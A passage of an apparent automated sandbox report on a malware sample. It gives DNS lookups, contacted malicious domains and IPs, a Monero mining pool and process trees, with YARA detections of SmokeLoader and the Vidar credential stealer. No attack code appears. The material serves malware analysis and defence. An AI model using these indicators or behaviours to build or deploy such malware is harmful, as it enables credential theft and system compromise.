                                                                                                                                                                                            Jan 14, 2022 12:29:31.582149982 CET8.8.8.8192.168.2.40x2eb3No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:29:41.910156012 CET8.8.8.8192.168.2.40x87cbNo error (0)microsoft-com.mail.protection.outlook.com104.47.54.36A (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:29:41.910156012 CET8.8.8.8192.168.2.40x87cbNo error (0)microsoft-com.mail.protection.outlook.com52.101.24.0A (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:29:41.910156012 CET8.8.8.8192.168.2.40x87cbNo error (0)microsoft-com.mail.protection.outlook.com40.93.207.0A (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:29:41.910156012 CET8.8.8.8192.168.2.40x87cbNo error (0)microsoft-com.mail.protection.outlook.com40.93.212.0A (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:29:41.910156012 CET8.8.8.8192.168.2.40x87cbNo error (0)microsoft-com.mail.protection.outlook.com40.93.207.1A (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:29:41.910156012 CET8.8.8.8192.168.2.40x87cbNo error (0)microsoft-com.mail.protection.outlook.com104.47.53.36A (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:29:44.645194054 CET8.8.8.8192.168.2.40x1a68No error (0)patmushta.info94.142.143.116A (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:29:53.220798969 CET8.8.8.8192.168.2.40xdaf0No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:29:53.386814117 CET8.8.8.8192.168.2.40x5b4cNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:29:53.576463938 CET8.8.8.8192.168.2.40x4a7cNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:29:53.755656958 CET8.8.8.8192.168.2.40x9d7eNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:29:53.921154976 CET8.8.8.8192.168.2.40x17caNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:29:54.085957050 CET8.8.8.8192.168.2.40xb79fNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:29:54.302371979 CET8.8.8.8192.168.2.40x5c2fNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:29:54.472028971 CET8.8.8.8192.168.2.40x3d2fNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:29:54.636883974 CET8.8.8.8192.168.2.40x4f2bNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:29:54.817362070 CET8.8.8.8192.168.2.40x4e70No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:29:54.985551119 CET8.8.8.8192.168.2.40x25a4No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:29:55.164411068 CET8.8.8.8192.168.2.40x8dccNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:29:55.418090105 CET8.8.8.8192.168.2.40xff6aNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:29:55.585751057 CET8.8.8.8192.168.2.40xa5dfNo error (0)data-host-coin-8.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:29:58.460091114 CET8.8.8.8192.168.2.40x648dNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:29:58.626797915 CET8.8.8.8192.168.2.40xd308No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:29:58.808177948 CET8.8.8.8192.168.2.40x8226No error (0)goo.su172.67.139.105A (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:29:58.808177948 CET8.8.8.8192.168.2.40x8226No error (0)goo.su104.21.38.221A (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:29:59.145658016 CET8.8.8.8192.168.2.40x8d36No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:29:59.324620008 CET8.8.8.8192.168.2.40xb0No error (0)transfer.sh144.76.136.153A (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:29:59.719247103 CET8.8.8.8192.168.2.40xf035No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:30:00.052918911 CET8.8.8.8192.168.2.40xb9a8No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:30:00.694416046 CET8.8.8.8192.168.2.40x336No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:30:00.978961945 CET8.8.8.8192.168.2.40x61eNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:30:01.340497971 CET8.8.8.8192.168.2.40xf3f6No error (0)data-host-coin-8.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:30:04.158957005 CET8.8.8.8192.168.2.40x82edNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:30:04.332336903 CET8.8.8.8192.168.2.40x43d2No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:30:04.546641111 CET8.8.8.8192.168.2.40x4cb4No error (0)transfer.sh144.76.136.153A (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:30:07.397336960 CET8.8.8.8192.168.2.40x7c19No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:30:07.579046965 CET8.8.8.8192.168.2.40x3d62No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:30:07.752860069 CET8.8.8.8192.168.2.40x7946No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:30:07.931826115 CET8.8.8.8192.168.2.40x5623No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:30:08.159605980 CET8.8.8.8192.168.2.40x598No error (0)transfer.sh144.76.136.153A (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:30:11.243046999 CET8.8.8.8192.168.2.40xfd8cNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:30:11.420278072 CET8.8.8.8192.168.2.40x30acNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:30:11.583112955 CET8.8.8.8192.168.2.40x5efbNo error (0)data-host-coin-8.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:30:13.512223959 CET8.8.8.8192.168.2.40xf3c6No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:30:13.683284044 CET8.8.8.8192.168.2.40xbbfeNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:30:13.870006084 CET8.8.8.8192.168.2.40xfa1fNo error (0)data-host-coin-8.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:30:15.946022034 CET8.8.8.8192.168.2.40xe24aNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:30:16.161323071 CET8.8.8.8192.168.2.40xa604No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:30:21.675123930 CET8.8.8.8192.168.2.40x8116No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:30:21.865549088 CET8.8.8.8192.168.2.40x6d9bNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:30:22.220680952 CET8.8.8.8192.168.2.40x510No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:30:25.792366028 CET8.8.8.8192.168.2.40xb7b6No error (0)patmushta.info94.142.143.116A (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:30:48.718033075 CET8.8.8.8192.168.2.40xab12No error (0)pool.supportxmr.compool-fr.supportxmr.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:30:48.718033075 CET8.8.8.8192.168.2.40xab12No error (0)pool-fr.supportxmr.com149.202.83.171A (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:30:48.718033075 CET8.8.8.8192.168.2.40xab12No error (0)pool-fr.supportxmr.com91.121.140.167A (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:30:48.718033075 CET8.8.8.8192.168.2.40xab12No error (0)pool-fr.supportxmr.com37.187.95.110A (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:30:48.718033075 CET8.8.8.8192.168.2.40xab12No error (0)pool-fr.supportxmr.com94.23.23.52A (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:30:48.718033075 CET8.8.8.8192.168.2.40xab12No error (0)pool-fr.supportxmr.com94.23.247.226A (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:31:16.139516115 CET8.8.8.8192.168.2.40x58e1No error (0)patmushta.info94.142.143.116A (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:31:38.621751070 CET8.8.8.8192.168.2.40xdeb8No error (0)microsoft-com.mail.protection.outlook.com104.47.54.36A (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:31:38.621751070 CET8.8.8.8192.168.2.40xdeb8No error (0)microsoft-com.mail.protection.outlook.com104.47.53.36A (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:31:38.621751070 CET8.8.8.8192.168.2.40xdeb8No error (0)microsoft-com.mail.protection.outlook.com40.93.207.1A (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:31:38.621751070 CET8.8.8.8192.168.2.40xdeb8No error (0)microsoft-com.mail.protection.outlook.com52.101.24.0A (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:31:38.621751070 CET8.8.8.8192.168.2.40xdeb8No error (0)microsoft-com.mail.protection.outlook.com40.93.207.0A (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:31:38.621751070 CET8.8.8.8192.168.2.40xdeb8No error (0)microsoft-com.mail.protection.outlook.com40.93.212.0A (IP address)IN (0x0001)

                                                                                                                                                                                            HTTP Request Dependency Graph

                                                                                                                                                                                            • rrooukv.org
                                                                                                                                                                                              • host-data-coin-11.com
                                                                                                                                                                                            • rxyqqf.net
                                                                                                                                                                                            • dutgomfkc.net
                                                                                                                                                                                            • qwfulsm.net
                                                                                                                                                                                            • rxkloxn.com
                                                                                                                                                                                            • hopcq.com
                                                                                                                                                                                            • ocnbwlevej.org
                                                                                                                                                                                            • gdffxf.org
                                                                                                                                                                                            • data-host-coin-8.com
                                                                                                                                                                                            • psgcnvvm.org
                                                                                                                                                                                            • vxjxd.org
                                                                                                                                                                                            • mpabshq.org
                                                                                                                                                                                            • ubyvpwxipt.net
                                                                                                                                                                                            • privacy-tools-for-you-780.com
                                                                                                                                                                                            • pxnotaacu.org
                                                                                                                                                                                            • lnpyohcdyx.com
                                                                                                                                                                                            • unicupload.top
                                                                                                                                                                                            • byfupx.org
                                                                                                                                                                                            • iijrpdo.org
                                                                                                                                                                                            • ntsddipn.org
                                                                                                                                                                                            • vkaflekmve.net
                                                                                                                                                                                            • seaed.com
                                                                                                                                                                                            • obclg.net
                                                                                                                                                                                            • pgydqikexd.org
                                                                                                                                                                                            • gminomh.net
                                                                                                                                                                                            • 185.7.214.171:8080
                                                                                                                                                                                            • tgajiadc.net
                                                                                                                                                                                            • xvuvc.org
                                                                                                                                                                                            • tdosgx.net
                                                                                                                                                                                            • npqwstsduq.net
                                                                                                                                                                                            • ouyysee.net
                                                                                                                                                                                            • rtqpowrk.org
                                                                                                                                                                                            • hhpljg.org
                                                                                                                                                                                            • ipycpcfbe.com
                                                                                                                                                                                            • sdstpsloir.org
                                                                                                                                                                                            • tfxyjpgh.net
                                                                                                                                                                                            • ycdbyxqt.net
                                                                                                                                                                                            • gcfxlgitg.org
                                                                                                                                                                                            • afdvsashlg.com
                                                                                                                                                                                            • kapjpsnnjq.org
                                                                                                                                                                                            • kcsjausffk.com
                                                                                                                                                                                            • djmmsjo.net
                                                                                                                                                                                            • ipjoaoftf.net
                                                                                                                                                                                            • sdkmuxkbh.org
                                                                                                                                                                                            • vomuxg.org
                                                                                                                                                                                            • fjenisnthl.net
                                                                                                                                                                                            • pixmwg.net
                                                                                                                                                                                            • mwbuboe.net
                                                                                                                                                                                            • pylkam.org
                                                                                                                                                                                            • fdhqx.net
                                                                                                                                                                                            • pslqekdvh.org
                                                                                                                                                                                            • ecicwppql.net
                                                                                                                                                                                            • tlwsaw.net
                                                                                                                                                                                            • krrkfa.com
                                                                                                                                                                                            • gfydmobm.net
                                                                                                                                                                                            • uhdak.net
                                                                                                                                                                                            • assuf.net
                                                                                                                                                                                            • rblisqqaii.com
                                                                                                                                                                                            • xnvwvqck.com
                                                                                                                                                                                            • vltihla.com
                                                                                                                                                                                            • qnqlcbx.com
                                                                                                                                                                                            • 185.215.113.35
                                                                                                                                                                                            • flqhri.com
                                                                                                                                                                                            • poqgfb.net
                                                                                                                                                                                            • oycnsawak.org
                                                                                                                                                                                            • 81.163.30.181
                                                                                                                                                                                            • 185.163.204.22
                                                                                                                                                                                            • 185.163.204.24
                                                                                                                                                                                            • ylanbcfwv.net
                                                                                                                                                                                            • yxorycdxma.net
                                                                                                                                                                                            • tcqdnx.net

                                                                                                                                                                                            Code Manipulations

                                                                                                                                                                                            Statistics

                                                                                                                                                                                            Behavior

                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                            System Behavior

                                                                                                                                                                                            Analysis Process: sbxGIUIhRd.exe PID: 6964 Parent PID: 5836

                                                                                                                                                                                            General

                                                                                                                                                                                            Start time:12:28:30
                                                                                                                                                                                            Start date:14/01/2022
                                                                                                                                                                                            Path:C:\Users\user\Desktop\sbxGIUIhRd.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:"C:\Users\user\Desktop\sbxGIUIhRd.exe"
                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                            File size:320000 bytes
                                                                                                                                                                                            MD5 hash:F768F4A81E8B87D6990895A35B8D7D6C
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:low

                                                                                                                                                                                            Analysis Process: sbxGIUIhRd.exe PID: 6984 Parent PID: 6964

                                                                                                                                                                                            General

                                                                                                                                                                                            Start time:12:28:31
                                                                                                                                                                                            Start date:14/01/2022
                                                                                                                                                                                            Path:C:\Users\user\Desktop\sbxGIUIhRd.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:"C:\Users\user\Desktop\sbxGIUIhRd.exe"
                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                            File size:320000 bytes
                                                                                                                                                                                            MD5 hash:F768F4A81E8B87D6990895A35B8D7D6C
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000001.00000002.719013921.0000000000580000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000001.00000002.719027443.00000000005A1000.00000004.00020000.sdmp, Author: Joe Security
                                                                                                                                                                                            Reputation:low

                                                                                                                                                                                            Analysis Process: explorer.exe PID: 3424 Parent PID: 6984

                                                                                                                                                                                            General

                                                                                                                                                                                            Start time:12:28:38
                                                                                                                                                                                            Start date:14/01/2022
                                                                                                                                                                                            Path:C:\Windows\explorer.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:C:\Windows\Explorer.EXE
                                                                                                                                                                                            Imagebase:0x7ff6fee60000
                                                                                                                                                                                            File size:3933184 bytes
                                                                                                                                                                                            MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000000.706607181.0000000004DC1000.00000020.00020000.sdmp, Author: Joe Security
                                                                                                                                                                                            Reputation:high

                                                                                                                                                                                            Analysis Process: svchost.exe PID: 6228 Parent PID: 568

                                                                                                                                                                                            General

                                                                                                                                                                                            Start time:12:28:40
                                                                                                                                                                                            Start date:14/01/2022
                                                                                                                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                                                                                            Imagebase:0x7ff6eb840000
                                                                                                                                                                                            File size:51288 bytes
                                                                                                                                                                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:high

                                                                                                                                                                                            Analysis Process: svchost.exe PID: 5420 Parent PID: 568

                                                                                                                                                                                            General

                                                                                                                                                                                            Start time:12:29:00
                                                                                                                                                                                            Start date:14/01/2022
                                                                                                                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                                                                                            Imagebase:0x7ff6eb840000
                                                                                                                                                                                            File size:51288 bytes
                                                                                                                                                                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:high

                                                                                                                                                                                            Analysis Process: adijaeg PID: 6604 Parent PID: 968

                                                                                                                                                                                            General

                                                                                                                                                                                            Start time:12:29:12
                                                                                                                                                                                            Start date:14/01/2022
                                                                                                                                                                                            Path:C:\Users\user\AppData\Roaming\adijaeg
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:C:\Users\user\AppData\Roaming\adijaeg
                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                            File size:320000 bytes
                                                                                                                                                                                            MD5 hash:F768F4A81E8B87D6990895A35B8D7D6C
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                            Reputation:low

                                                                                                                                                                                            Analysis Process: adijaeg PID: 4204 Parent PID: 6604

                                                                                                                                                                                            General

                                                                                                                                                                                            Start time:12:29:14
                                                                                                                                                                                            Start date:14/01/2022
                                                                                                                                                                                            Path:C:\Users\user\AppData\Roaming\adijaeg
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:C:\Users\user\AppData\Roaming\adijaeg
                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                            File size:320000 bytes
                                                                                                                                                                                            MD5 hash:F768F4A81E8B87D6990895A35B8D7D6C
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000A.00000002.767064606.0000000000561000.00000004.00020000.sdmp, Author: Joe Security
                                                                                                                                                                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000A.00000002.766964771.0000000000420000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                            Reputation:low

                                                                                                                                                                                            Analysis Process: svchost.exe PID: 6976 Parent PID: 568

                                                                                                                                                                                            General

                                                                                                                                                                                            Start time:12:29:15
                                                                                                                                                                                            Start date:14/01/2022
                                                                                                                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                                                                                            Imagebase:0x7ff6eb840000
                                                                                                                                                                                            File size:51288 bytes
                                                                                                                                                                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:high

                                                                                                                                                                                            Analysis Process: 8A6B.exe PID: 6760 Parent PID: 3424

                                                                                                                                                                                            General

                                                                                                                                                                                            Start time:12:29:16
                                                                                                                                                                                            Start date:14/01/2022
                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\8A6B.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:C:\Users\user\AppData\Local\Temp\8A6B.exe
                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                            File size:301056 bytes
                                                                                                                                                                                            MD5 hash:277680BD3182EB0940BC356FF4712BEF
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                            Reputation:moderate

                                                                                                                                                                                            Analysis Process: 95C6.exe PID: 6844 Parent PID: 3424

                                                                                                                                                                                            General

                                                                                                                                                                                            Start time:12:29:18
                                                                                                                                                                                            Start date:14/01/2022
                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\95C6.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:C:\Users\user\AppData\Local\Temp\95C6.exe
                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                            File size:320000 bytes
                                                                                                                                                                                            MD5 hash:F768F4A81E8B87D6990895A35B8D7D6C
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                            Reputation:low

                                                                                                                                                                                            Analysis Process: svchost.exe PID: 6868 Parent PID: 568

                                                                                                                                                                                            General

                                                                                                                                                                                            Start time:12:29:19
                                                                                                                                                                                            Start date:14/01/2022
                                                                                                                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                                                                                            Imagebase:0x7ff6eb840000
                                                                                                                                                                                            File size:51288 bytes
                                                                                                                                                                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:high

                                                                                                                                                                                            Analysis Process: WerFault.exe PID: 6924 Parent PID: 6868

                                                                                                                                                                                            General

                                                                                                                                                                                            Start time:12:29:19
                                                                                                                                                                                            Start date:14/01/2022
                                                                                                                                                                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 6760 -ip 6760
                                                                                                                                                                                            Imagebase:0x1160000
                                                                                                                                                                                            File size:434592 bytes
                                                                                                                                                                                            MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:high

                                                                                                                                                                                            Analysis Process: 95C6.exe PID: 6804 Parent PID: 6844

                                                                                                                                                                                            General

                                                                                                                                                                                            Start time:12:29:20
                                                                                                                                                                                            Start date:14/01/2022
                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\95C6.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:C:\Users\user\AppData\Local\Temp\95C6.exe
                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                            File size:320000 bytes
                                                                                                                                                                                            MD5 hash:F768F4A81E8B87D6990895A35B8D7D6C
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000010.00000002.787707490.0000000002051000.00000004.00020000.sdmp, Author: Joe Security
                                                                                                                                                                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000010.00000002.787566424.0000000002030000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                            Reputation:low

                                                                                                                                                                                            Analysis Process: WerFault.exe PID: 6812 Parent PID: 6760

                                                                                                                                                                                            General

                                                                                                                                                                                            Start time:12:29:21
                                                                                                                                                                                            Start date:14/01/2022
                                                                                                                                                                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6760 -s 520
                                                                                                                                                                                            Imagebase:0x1160000
                                                                                                                                                                                            File size:434592 bytes
                                                                                                                                                                                            MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:high

                                                                                                                                                                                            Analysis Process: CFE8.exe PID: 4296 Parent PID: 3424

                                                                                                                                                                                            General

                                                                                                                                                                                            Start time:12:29:22
                                                                                                                                                                                            Start date:14/01/2022
                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\CFE8.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:C:\Users\user\AppData\Local\Temp\CFE8.exe
                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                            File size:323072 bytes
                                                                                                                                                                                            MD5 hash:E1AF41681888A847863EE17BD63450A0
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000012.00000002.778871372.0000000000873000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                            • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000012.00000002.778871372.0000000000873000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                            Reputation:low

                                                                                                                                                                                            Analysis Process: E2A6.exe PID: 4752 Parent PID: 3424

                                                                                                                                                                                            General

                                                                                                                                                                                            Start time:12:29:27
                                                                                                                                                                                            Start date:14/01/2022
                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\E2A6.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:C:\Users\user\AppData\Local\Temp\E2A6.exe
                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                            File size:320000 bytes
